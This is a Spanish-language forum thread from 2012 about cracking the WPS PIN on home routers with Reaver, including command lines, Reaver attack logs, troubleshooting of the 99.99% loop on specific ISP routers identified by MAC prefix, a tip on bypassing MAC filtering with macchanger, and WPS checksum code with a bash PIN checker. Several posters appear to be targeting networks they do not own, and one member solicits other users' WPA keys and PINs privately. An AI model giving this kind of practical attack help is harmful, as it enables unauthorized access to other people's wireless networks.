si tu amigo ingeniero de informática sabe como "desbloquear el bloqueo del WPS" de estos tipos de routeurs (sin reiniciarlo a mano para levantar el bloqueo del WPS, que esto sabemos hacerlo  ;D) es muy interesante y sería aún más interesante si lo invitas a venir compartir esto directamente con nostr@s, si le apetece hablar del tema con nosotr@s.  ;)

2 > El filtrado mac, o fisco (el botón de las livebox) o... "no-fisico" / "digital"  ;D. El que activas mediante configuración de tu routeur.
Y esto no es ninguna protección porque basta con clonar una mac legitima para burlar este sistema de "protección". Se le llama "mac spoofing" y lo puedes hacer con programas sencillos tipo macchanger.   
No hace falta buscar táctica sofisticada ni amigo ingeniero  ;)



Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: fjarias en Octubre 19, 2012, 11:08:06 am
Buenas chicos, aqui espongo mi caso con el revaer 1.4, en mi red con bssid 8C:0C:A3:xx:xx:xx con bssid wlan_xxxx me da error tras bastantes horas en el 99,99% y al quedarse en este porcentaje siempre prueba en mismo pin, el chisep es un atheros ar9285, que puede ser?? Saludos!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Octubre 19, 2012, 13:45:35 pm
Como este tema lo leéis much@s y aprovechando la última respuesta de fjarias os insto a que los que no hayáis leído las  normas las leáis YA, y quienes lo hayáis hecho hace tiempo las volváis a leer de nuevo.

NO se puede estar todo el día explicando lo mismo.. y no hacéis caso, sino porqué creéis que os sale este cartel?

Citar
###LEER_NORMAS_DEL_FORO|Este_mensaje_sera_borrado###

Coñe!   Poned un poco de vuestra parte de una vez..

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: fjarias en Octubre 19, 2012, 13:47:24 pm
Ok maripuri! Perdon jeje, haber si podeis echarme una mano con el problema, un saludete!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Octubre 19, 2012, 15:09:12 pm
aprovecho tu mensaje para explicar que tu mensaje y los del palo no sirven para nada.
Si no toméis la molestia de exponer los hechos y elementos necesarios a cualquier embrión de respuesta, no tendréis respuesta
Poner capturas de pantallas de lo que pasa en airodump-ng y reaver, los comandos exactos empleados (copiado/pegado para ser seguro de no hacer errores al transcribir, decirnos cual es el modelo exacto del routeur, el chipset de nuestro adaptador etc. etc.
 
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mbalakh en Octubre 23, 2012, 04:24:00 am
He movido unos cuantos posts desde el hilo "WPS reaver desde 0".
Aqui hablamos de lo que no es instalacion y configuracion de reaver.
El routeur te da la llave en 256 bits. Pasa con unos routeurs.
Funciona igualmente.
Las orange nos bloqueen porque llevan una protección, si bien me recuerdo se activa después de 10 PIN falsos y desactiva el WPS por un tiempo.
O esperas o reinicias tu routeur.


kcdtv, perdon pero no vi la respuesta :S ... entonces si cuando meto la clave no conectan a que se debe ? a que han cambiado la contraseña?? he probado en 2 routers igual y cuando pongo la contraseña wpa de 256bits no llegan nunca a conectar y me dice error de coincidencia de claves de seguridad.

se puede deber a alguna otra cosa ?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: fjarias en Octubre 25, 2012, 12:56:01 pm
Pues he probado con lared 30:39:F2 y todos los pines que ponen un full diclosure y no da la clave, sigue probando el pin interminablemente, algun consejo?? Saludos!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: karkomo en Octubre 25, 2012, 13:06:07 pm
Hola fjarias yo tengo esa Red y el router ha llegado a darme hasta 6 pines diferentes.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: norgren en Octubre 25, 2012, 21:52:44 pm
He estado viendo el primer post, no teneis ninguna informacion aun sobre wlan_xxxx 8C:0C:A3?? Saludos!!

pues con 12 horas rulando iba x el 19,5 % me canse y lo dejé.Por ese camino necesitaba 2.5 días .Si me deja el crio el portatil probaré d nuevo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 8carlos88 en Octubre 25, 2012, 23:46:57 pm
yo lo consegui y he tardado mas o menos eso, yo iba guardando la sesion.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: eufra en Octubre 26, 2012, 00:16:48 am
8carlos88 pues yo tambien he sistido con esa red la verdad que siempre se me queda en el bucle de 99.99 los primeros digitos los encuentra utilize el que me dijiste y mandaba el m5 y el m6 pero que me extrañaba es que repetia el pin y despues lo volvia a repetir y seguia con oro y vuelta a repetir podrias aportar algo mas para saber como lo has hecho please.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Octubre 26, 2012, 01:41:35 am
Pues he probado con lared 30:39:F2 y todos los pines que ponen un full diclosure y no da la clave, sigue probando el pin interminablemente, algun consejo?? Saludos!

Esto es porque usas la versión 1.4 de reaver que tiene un bug en el opción -p.
No tiene que ver con los PINes, cualquier PIN que pongas, malo o bueno, obtendrás este resultado extraño, va probando en búcle el mismo PIN pero el ataque adelanta según el porcentaje, pero claro, llega al 99% y no te da la llave porque el ataque no se ha desarrollado de verdad.
El consejo es o hacer el ataque normalmente con la versión que usas o usar la versión 1.3
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 8carlos88 en Octubre 26, 2012, 10:02:02 am
8carlos88 pues yo tambien he sistido con esa red la verdad que siempre se me queda en el bucle de 99.99 los primeros digitos los encuentra utilize el que me dijiste y mandaba el m5 y el m6 pero que me extrañaba es que repetia el pin y despues lo volvia a repetir y seguia con oro y vuelta a repetir podrias aportar algo mas para saber como lo has hecho please.

la verdad q no hice nada raro sino q no fue continuado y desde cero sin pines, fue linux primero wascra... y luego reaver guardando la sesion, la verdad es q tengo buena conexion., lo hice con la wifistation ext. no se q mas contarte, tarde 3 dias, lo dejaba por la noche pero la clave me la dio por el dia.


un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: norgren en Octubre 26, 2012, 12:44:44 pm
me puede decir alguien como puedo guardar la sesión en xiopan para poder atacar las wlan_xxxx 8C:0C:A3 pues como ya he dicho antes se necesitan 2,5 días.Y no quiero quedarme sin pc tanto tiempo.gracias y un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 8carlos88 en Octubre 26, 2012, 16:37:43 pm
me puede decir alguien como puedo guardar la sesión en xiopan para poder atacar las wlan_xxxx 8C:0C:A3 pues como ya he dicho antes se necesitan 2,5 días.Y no quiero quedarme sin pc tanto tiempo.gracias y un saludo.

hazlo por las noches y guarda sesion, en linux, asi lo hice yo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: panchito en Octubre 31, 2012, 13:45:43 pm
He leido y comprobado que cuando llega el envío de pins al 20% mas/menos es que ha encontrado los 4 primeros digitos del pin del router. Llevo comprobando el mio 5C:33:8E:XX:XX:XX WLAN_XXXX  mod.Home station fab. ALPHA NETWORS INC a mas del 30% y sigue sin saltar al 90%. He de decir tambien que va muy lenta la capturas de pin con estos router comprobado con otro del mismo modelo. Es normal que no me salte al 90% ya con ese % transcurrido? porque me huele mal que espere al 100% despues de las horas que llevo empleado y no me dé la clave. Uso reaver 1.4
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Octubre 31, 2012, 23:12:05 pm
panchito, has de entender lo que haces,...
¿ porque tendría que saltar te del 20 al 90%.?
No hay razones... es tener suerte a que el PIN que pruebas salga en los primeros o en los últimos.
Si te puede convencer mirra esto y verás que aveces tienes que esperar hasta casi el 90%, dependra de la suerte que tendrás >
Código: [Seleccionar]
[+] 89.07% complete @ 2012-06-25 00:57:22 (5 seconds/attempt)
[+] Trying pin 8020@@78
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[+] Sending WSC NACK
[+] Trying pin 8020@@35
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin
[+] Trying pin 802037@@
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x3), re-trying last pin
[+] Trying pin 802037@@
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin
[+] Trying pin 802037@@
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x3), re-trying last pin
[+] 90.92% complete @ 2012-06-25 00:57:51 (5 seconds/attempt)
[+] Trying pin 802037@@
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[+] Sending WSC NACK

En este caso tuvo que esperar 89 y pico.. pero es lo que hay.
Tuve muy muy mala suerte
Por supuesto he obtenido la llave,
110% tranquilo que esto no va a ocurrir  ;D
en el peor de los casos llegas a 100 con un bug - error y no tienes la llave pero nunca llegaras ni a 101%
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: matibleda en Noviembre 02, 2012, 10:43:43 am
Hola, después de seguir este foro desde la sombra he decidido registrarme para ser uno más.

Necesito ayuda con mi router (FTE-XXXX MAC: 94:FE:FA:XX:XX:XX) no consigo que empieza a probar pines, no sé que hago mal!!

Lo estoy haciendo desde la versión 1.4 de Reaver con un wifislax 4.2 (no sé si esto tendrá algo que ver)

un saludo!!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 02, 2012, 15:36:08 pm
Si no nos dices nada más, no podemos decirte nada  ;)
Necesitamos:
- copiado/pegado de los comandos y su resultado en consola.
- captura de pantalla de airodump-ng con filtro bssid y canal sobre tu AP
- resultado de >
Código: [Seleccionar]
airmon-ng
Código: [Seleccionar]
iwconfig- modelo routeur, confirmar que sea un HG532.

Y con esto ya tenemosd algo de base para ver que ocurre en tu caso  ;)
Y sería la ostia si me comunicarías por mensages privados los datos de tu routeur, se necesitan para investigar.
Necesito

Numero de serie (serial)
essid
bssid
pass WPA
pin WPS

Bienvenid@ al foro  :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: panchito en Noviembre 02, 2012, 18:05:43 pm
kcdtv ok por tu respuesta. Tienes razón, me ha saltado a 36% y encontrado pin al 98% cuestión de paciencia.. si sirve de algo a modo de información para foreros que los router de movistar (los nuevos mod.Home station fab. ALPHA NETWORS INC) la captura de pins es muy lenta 14 sg/p. muchas  horas lo mejor ir salvando sesiones si no se quiere tener el pc encendido muchas horas.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: notepad en Noviembre 02, 2012, 18:38:55 pm
Sobre las 8c:0c:a3 :

Haciendo pruebas con datos que me a enviado 8carlos88, seguimos igual con el famoso bucle 99.99%
Lo unico que se me ocurre es que solo funcione con la wifistation ext que el utiliza.

Podemos descartar en mi caso:

Reaver 1.3 y 1.4  ALFA36h
Reaver 1.3 y 1.4  ALFA036NH
Reaver 1.3 y 1.4  RalinkRT2500

La Wifistation ext, lleva chipset atheros ar9271, si alguien pudiera hacer la prueba nos sacaria de dudas.

Haber si entre todos damos con la clave. Un salu2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: eufra en Noviembre 03, 2012, 00:26:42 am
pues yo me he quedado como tu en el 99,99 tengo alfa 2w blanca chipset realtek8188ru utilizado reaver1.4
buscare un hueco y probare con la approx 2w chipset ralink 3072l haber que pasa.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: matibleda en Noviembre 03, 2012, 01:09:52 am
Si no nos dices nada más, no podemos decirte nada  ;)
Necesitamos:
- copiado/pegado de los comandos y su resultado en consola.
- captura de pantalla de airodump-ng con filtro bssid y canal sobre tu AP
- resultado de >
Código: [Seleccionar]
airmon-ng
Código: [Seleccionar]
iwconfig- modelo routeur, confirmar que sea un HG532.

Y con esto ya tenemosd algo de base para ver que ocurre en tu caso  ;)
Y sería la ostia si me comunicarías por mensages privados los datos de tu routeur, se necesitan para investigar.
Necesito

Numero de serie (serial)
essid
bssid
pass WPA
pin WPS

Bienvenid@ al foro  :)

Perdón si he incumplido las normas!!

Pues hago el reaver desde el minidwep-gtk y lo único que hace es probar el primero y ya, ahí se queda como congelado!!el modelo del router no estoy muy seguro pero es como el que me has comentado (la caja estará en el quinto infierno) !!el pass lo cambie al mismo recibirlo y la contraseña de fábrica no sé cual es porque mi hermano pequeño le quito la pegatina donde salía es info y la del pin wps!!a ver si me puedes echar un cable!!gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 03, 2012, 06:33:15 am
A parte lo de las normas, lo que te digo tiene que ver con la información mínima necesaria para empezar a averiguar algo.
El modelo de routeur no cambia después un reset, y esta información la tienes en tu pagina de configuración de routeur.
Como le has cambiado la llave, no tendrás ningunos problemas en encontrar el numero de serie, el modelo del routeur etc.... 

y luego hacer lo que te he pedido, capturas de pantallas y copiado/pegado de la consola airodump-ng plus resultado de los comandos dados mas arriba.
Necesitamos datos  ;)

@ Notepad y eufra:
¿De que modelo de routeur exacto se trata?
No hay dudas a cerca de los dos chipset (ar9271 y rtl8187l)que de ahí no viene el problema... las únicas dudas son respecto a lo que hacéis.  :P
Lo mismo que antes>
¿cual es el modelo exacto del routeur?
captura de pantalla de airodump-ng fijado sobre canal y bssid
copiado/pegado de lo que pasa en reaver. etc.
Antes de dejaros decir más cosas voy a pedir que hagáis esto porque aquí no nos basamos en rumores, solo hechos, lo que implica hacer las pruebas debidamente..  ;)
Acláranos > ¿De que routeur hables? ¿Que modelo exactamente?
¿RXQ y PWR en airdoump-ng?
Y seguimos hablando, sino no no tenemos elementos para hablar.  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 8carlos88 en Noviembre 04, 2012, 20:22:26 pm
Sobre las 8c:0c:a3 :

Haciendo pruebas con datos que me a enviado 8carlos88, seguimos igual con el famoso bucle 99.99%
Lo unico que se me ocurre es que solo funcione con la wifistation ext que el utiliza.

Podemos descartar en mi caso:

Reaver 1.3 y 1.4  ALFA36h
Reaver 1.3 y 1.4  ALFA036NH
Reaver 1.3 y 1.4  RalinkRT2500

La Wifistation ext, lleva chipset atheros ar9271, si alguien pudiera hacer la prueba nos sacaria de dudas.

Haber si entre todos damos con la clave. Un salu2

hola, prueba echa con la alfa 2w y minidwep y poniendo el pin y en 5 seg me dio la clave....mi consejo es q lo hagais sin pin...

un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: scragg en Noviembre 07, 2012, 11:59:54 am
En que quedamos, 8carlos88, hay que poner el pin, o no hay que poner el pin?

Aparte de esto, nunca he llegado a entender, lo del pin, si introduces el pin, se supone que para cada router, tiene su pin específico, no puede haber uno para todos los router.

En el reaver 1.4, si introduces el pin, está todo el rato probando el mismo pin, no se supone que cada intento es un pin diferente?

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 8carlos88 en Noviembre 07, 2012, 12:07:54 pm
En que quedamos, 8carlos88, hay que poner el pin, o no hay que poner el pin?

Aparte de esto, nunca he llegado a entender, lo del pin, si introduces el pin, se supone que para cada router, tiene su pin específico, no puede haber uno para todos los router.

En el reaver 1.4, si introduces el pin, está todo el rato probando el mismo pin, no se supone que cada intento es un pin diferente?

yo pienso y luego q cada uno haga lo q quiera....

primero probaria el pin pq se pierde poco tiempo, pero sino la saca, empezaria desde cero.

he hecho la prueba para q se viera q si daba la clave con el pin, pq hay gente q se le quedaba en el 99,99% y tb por probarla con otro adaptador...

un saludo

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: scragg en Noviembre 07, 2012, 12:18:44 pm
Yo estoy probando con la alfa awus036h 500 y se queda en el 99%

tengo una tp link422 chipset atheros. igual pruebo con est haber que hace.
lo de salvar sesion como es? esta en el menu preferencias??

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 07, 2012, 14:17:41 pm
Quedamos en que
1> reaver 1.4 =
Código: [Seleccionar]
opción p defectuosa
Si queréis utilizar el opción -p y poner un PIN especifico tenéis que usar la versión 1.3
Esto esta dicho x veces en este foro y por la red...
2> No hay ninguno problema con los drivers, de hecho es algo absurdo pensar que unos drivers no van solo con un modelo de routeur.
El routeur no se dice; "esto es un atheros, no me gustan los atheros, le voy a mandar PIN inválidos pero al colega rtl8187l le mandaré los PINes como debido."  ;)
Ath9k y rtl8187l que tengo en mi posesión van de lujo con reaver wps y wpscrack.
Para USB son los dos chipset a aconsejar, tranqui es buen material que tienes entre manos.  ;)
 
lee

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: chungalex en Noviembre 08, 2012, 14:11:19 pm
Buenas he estado siguiendo el hilo y quería comentar algo.
Por lo que he estado leyendo del protocolo WPS el ultimo digito del ping es un cheksum calculado a partir de los otros siete. Por ello reaver no comprueba todos los pines restantes con los ultimos 4 digitos, sino que reduce las posibilidades a los anteriores 3 digitos. He visto en otro sitio un usuario realiza pruebas a su propio router 8C:0C:A3 y al usar reaver con el parametro -p poniendo el pin que le viene por defecto en este, reaver pone otro ultimo digito automaticamente con lo cual no le da la clave. El usuario achaca este error a un bug de reaver cuando yo creo que es por el tema del cheksum por lo que lo hace. Mi consulta es, no se si es una locura pues no se mucho del tema, puede que estos router traigan un ultimo digito distinto a los que reaver calcula que por cheksum deberia ser y por ello llega al 99.99% sin encontrarlo. Algun usuario con un router propio que verifique que el pin que trae por defecto al hacer un reaver con -p , reaver pruebe realmente este pin y no cambie el último digito.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 08, 2012, 15:37:54 pm
reaver integra la funcción checksum, si le metes un pin que no es valido ni lo prueba y te lo corrige solo  ;)
Código: [Seleccionar]
sudo reaver -i mon0 -b 30:39:F2:XX:XX:XX -p 99999999 -vv

Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session? [n/Y] n
[+] Waiting for beacon from 30:39:F2:xxxxxxxx
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Associated with 30:39:F2:8xxxxxx (ESSID: Wifixxxxxxxxxxxxxxxxxxxxxxx)
[+] Trying pin 99999995

Ahí le meto un PIN que no es valido, 99999999, y wps reaver ni lo prueba, pasa directo al PIN con el 8avo numero valido.

prueba directo 99999995 que es el unico PIN valido

(http://i.imm.io/KT4p.png)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: chungalex en Noviembre 08, 2012, 15:44:12 pm
Por eso comento la posibilidad de que esos router 8c:0c:a3 traigan un pin con digito final no valido para reaver. pues en el enlace que vi del usuario tenia por defecto un pin que cuando se lo da a reaver este lo modifica como bien has dicho. la cosa es que a continuación cambia en el router el pin por uno que si esta en el diccionario de reaver y reaver si saca la clave. En resumen, algun usuario ha comprobado en su router mac 8c:0c:a3 que el pin que trae por defecto esta en el diccionario de reaver, o sea tiene como ultimo digito los que reaver pone como cheksum. ¿ 8carlos88 modificaste el pin de tu router antes de pasarle reaver y conseguir  la llave?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 08, 2012, 16:15:01 pm
Los routeurs no definen la norma WPS, mejor dicho, los routeurs siguen la norma WPS.
Es un protocolo definido por la wifi alliance y patentado, es externo a los fabricantes, cómo lo es el WPA, el WEP.
La estructura del PIN esta impuesta, dos bloques de 4 y ultimo digito checksum de los 7 anteriores

(http://img6.imagebanana.com/img/5s8pmwle/Seleccin_015.png)

PDF de Stefan VIEHBOECK

En resumen, la posibilidad que evocas es imposible.  ;)

Si eres amante de las mathes, aqui tienes las condiciones

The formula of calculating checksum:
int ComputeChecksum(unsigned long int PIN)

{
unsigned long int accum = 0;
PIN *= 10;
accum += 3 * ((PIN / 10000000) % 10);
accum += 1 * ((PIN / 1000000) % 10);
accum += 3 * ((PIN / 100000) % 10);
accum += 1 * ((PIN / 10000) % 10);
accum += 3 * ((PIN / 1000) % 10);
accum += 1 * ((PIN / 100) % 10);
accum += 3 * ((PIN / 10) % 10);
int digit = (accum % 10);
return (10 - digit) % 10;
}


The formula of validating the checksum:
bool ValidateChecksum(unsigned long int PIN)


{
unsigned long int accum = 0;
accum += 3 * ((PIN / 10000000) % 10);
accum += 1 * ((PIN / 1000000) % 10);
accum += 3 * ((PIN / 100000) % 10);
accum += 1 * ((PIN / 10000) % 10);
accum += 3 * ((PIN / 1000) % 10);
accum += 1 * ((PIN / 100) % 10);
accum += 3 * ((PIN / 10) % 10);
accum += 1 * ((PIN / 1) % 10);
return (0 == (accum % 10));
}

Realtek 8186 Wi-Fi Protected Setup
User Guide V1.0
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: chungalex en Noviembre 08, 2012, 16:36:41 pm
Ok. gracias por la aclaración kcdtv
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 08, 2012, 18:21:51 pm
De nada.  ;)
Aquí tenéis un script en bash para comprobar un PIN (gracias a dirneet y antares_145 de crack-wifi.com por la ayuda y la paciencia, sin ellos  ::) )
Código: [Seleccionar]
#!/bin/bash
clear
echo " __     __     ______   ______                           "       
echo "/\ \  _ \ \   /\  == \ /\  ___\                          "
echo "\ \ \/ |.\ \  \ \  _-/ \ \___  \                         "
echo " \ \__/|.~\_\  \ \_\    \/\_____\                        "
echo "  \/_/   \/_/   \/_/     \/_____/  CHECK THIS PIN!       "
echo ""
echo ""
echo ""
echo ""
read -p "introducir el PIN WPS para comprobación: " PIN
ACCUM=0

ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`

RESTE=`expr $ACCUM '%' 10`

if [ $RESTE -eq 0 ]
then
echo "Después comprobación este PIN WPS es valido :)"
        exit 0
else
echo "El ultimo digito del PIN WPS $CHECKSUM no es valido :("
exit 1
fi

recuerdo que para usar un script tenéis que pegarlo en un editor de texto sencillo tipo leafpad, gedit etc... guardar lo bajo la forma de un fichero con extensión .sh; ejemplo, PIN.sh.
Y para ejecutarlo os situáis en el mismo directorio (en la misma carpeta) y desde consola escribir sh PIN.sh (le ponéis el nombre que queréis)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: notepad en Noviembre 08, 2012, 21:35:38 pm
No es por nada, pero si cambias el PIN en el router no se desmorona esta teoria? Lo digo porque entonces el checksum no seria el correcto digo yo.

Yo lo que creo que lo suyo seria un diccionario de 4 digitos en lugar de 3 para la segunda cadena.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 08, 2012, 22:29:03 pm
No es una teoría es la norma WPS.
El quien hace teorías eres tu,  ;) y tu teoria es básicamente que se puede establecer una conexión wps con un PIN que no respecta la norma WPS.
Es decir un PIN con un octavo dígito que no es checksum o un PIN con 15 números o escrito con letras o que tenga un esapcio en el medio, es como quieres.
Ahora necesitarías demostrar tu tehoria a base de datos y experiencias, es decir estableciendo una conexión WPS con un PIN que es de 9 cifras o con letras o que tenga un actavo digito que no es un checksum como establece la norma WPS.
Es muy facil a averiguar, configuras tu routeur con PIN WPS 99999999 y te intentas conectar o atacar con reaver y mirra si consigues conectarte con 99999999.  ;)
Lo que dices es cómo afirmar que una llave WEP hexadecimal puede contener un ñ, vas a necesitar muchas pruebas para convencer al mundo entero.

Citar
PIN Proof of Possession
E-Hash1 is derived from the session parameters and the device password. First, the device password is converted to two 128-bit PSK values as follows:

PSK1 = first 128 bits of HMACAuthKey(1st half of DevicePassword)

PSK2 = first 128 bits of HMACAuthKey(2nd half of DevicePassword)


The enrollee creates two 128-bit secret nonces (E-S1 and E-S2) and then computes:

E-Hash1 = HMACAuthKey(E-S1 || PSK1 || PKE || PKR)

E-Hash2 = HMACAuthKey(E-S2 || PSK2 || PKE || PKR)


The registrar creates two 128-bit secret nonces (R-S1 and R-S2) and then computes:

R-Hash1 = HMACAuthKey(R-S1 || PSK1 || PKE || PKR)

R-Hash2 = HMACAuthKey(R-S2 || PSK2 || PKE || PKR)


The hash values are gradually exchanged and verified in messages M3 through M7. If a verification check of one of the Device Password parts fails, the receiving side must acknowledge the message with a failure indication and the enrollee and registrar must stop the protocol and discard all keys and nonces that are associated with the session.


PIN Checksum

Windows Vista supports both 4- and 8-digit PINs. Only devices with displays can use the 4digit PIN. Although the WCNNET specification supports rekeying, Windows Vista does not.

The device password ID must be default, value = 0 (the device password is a PIN). For 8digit numeric PINs, the last digit in the PIN is used as a checksum of the other digits. The algorithm to validate the checksum is given in the following C code.

bool ValidateChecksum(unsigned long int PIN)
{
    unsigned long int accum = 0;
   accum += 3 * ((PIN / 10000000) % 10);
   accum += 1 * ((PIN / 1000000) % 10);
   accum += 3 * ((PIN / 100000) % 10);
   accum += 1 * ((PIN / 10000) % 10);
   accum += 3 * ((PIN / 1000) % 10);
   accum += 1 * ((PIN / 100) % 10);
   accum += 3 * ((PIN / 10) % 10);
   accum += 1 * ((PIN / 1) % 10);
   
      return (0 == (accum % 10));
}

The corresponding algorithm to compute the checksum digit, assuming the other seven random PIN digits, is as follows:

int ComputeChecksum(unsigned long int PIN)
{
       unsigned long int accum = 0;
   accum += 1 * ((PIN / 1000000) % 10);
   accum += 3 * ((PIN / 100000) % 10);
   accum += 1 * ((PIN / 10000) % 10);
   accum += 3 * ((PIN / 1000) % 10);
   accum += 1 * ((PIN / 100) % 10);
   accum += 3 * ((PIN / 10) % 10);

   int digit = (accum % 10);
   return (10 - digit) % 10;
}

 "Windows Connect Now–NET (WCN-NET) Specifications"


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: notepad en Noviembre 08, 2012, 22:47:47 pm
Yo no tengo que demostrar absolutamente nada mas bien porque si te fijas bien lo estoy preguntando con interrogacion, no creo que sea para que uno se ponga asi, en fin gracias por la respuesta.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Noviembre 08, 2012, 22:53:03 pm
Con humor, a mi no me importa, te intento explicar algo ;)
Y si, lo siento, pero si elaboras una theoria que refuta lo establecido vas a tener que demostrarla a base de experimentos, es el procedimiento en todos los ámbitos.
Dicho sin malicia ni poniendo me  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Noviembre 09, 2012, 08:55:24 am
Entonces,¿un PIN no puede ser nunca ,por ejemplo,99999999 aunque se lo cambiemos por el que viene por defecto?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: chungalex en Noviembre 09, 2012, 10:57:03 am
Por lo visto ese router te deja ponerle cualquier pin pero que funcione el protocolo wps con ese pin ya es otra cosa. Lo digo pq he leido un usuario que achacaba a un bug de reaver el echo de que este no probaba el pin que en ese momento tenia puesto el router, ya no se si por defecto o pq el estuvo trasteando. Luego ponia una captura donde decia que le habia cambiado el pin por otro y resulta que este si cumplia el cheksum y el router le da la llave.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: scragg en Noviembre 10, 2012, 09:23:34 am
En que aplicacion esta el reaver 1.3? me estoy volviendo loco para bajarla y no la encuentro.
Siempre me sale la v 1.4
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: eufra en Noviembre 11, 2012, 02:43:33 am
y digo yo si el reaver tiene fallas por que no sacaran otra version mejorada.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Noviembre 11, 2012, 07:17:52 am
@scragg

http://code.google.com/p/reaver-wps/downloads/list?can=1&q=

Musho musho no has buscao ;)

Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: dirneet en Noviembre 11, 2012, 11:10:13 am
En numerosas ocasiones se ha explicado la vulnerabilidad de este metodo en ciertos routers, el reaver no tiene fallo ya que simplemente ataca al router aplicando un protocolo muy sencillo y espera respuesta por parte del router. Para que el ataque sea efectivo tiene que haber una buenas condiciones como recepcion y que el router no tenga la "habilidad" de que despues de ciertos ataques se bloquee.

He leido anteriormente que si le pones por ejemplo un pin 99999999 no funciona el reaver, por supuesto que no y tampoco le puedes poner a un router ese pin, ya que no sigue la norma lo he provado en 5 router (AW-4062 - p870hw - hg556a - hg553 - td153 )y no me ha dejado cambiarlo o salia una ventana mensaje pin no valido.

Saludos.

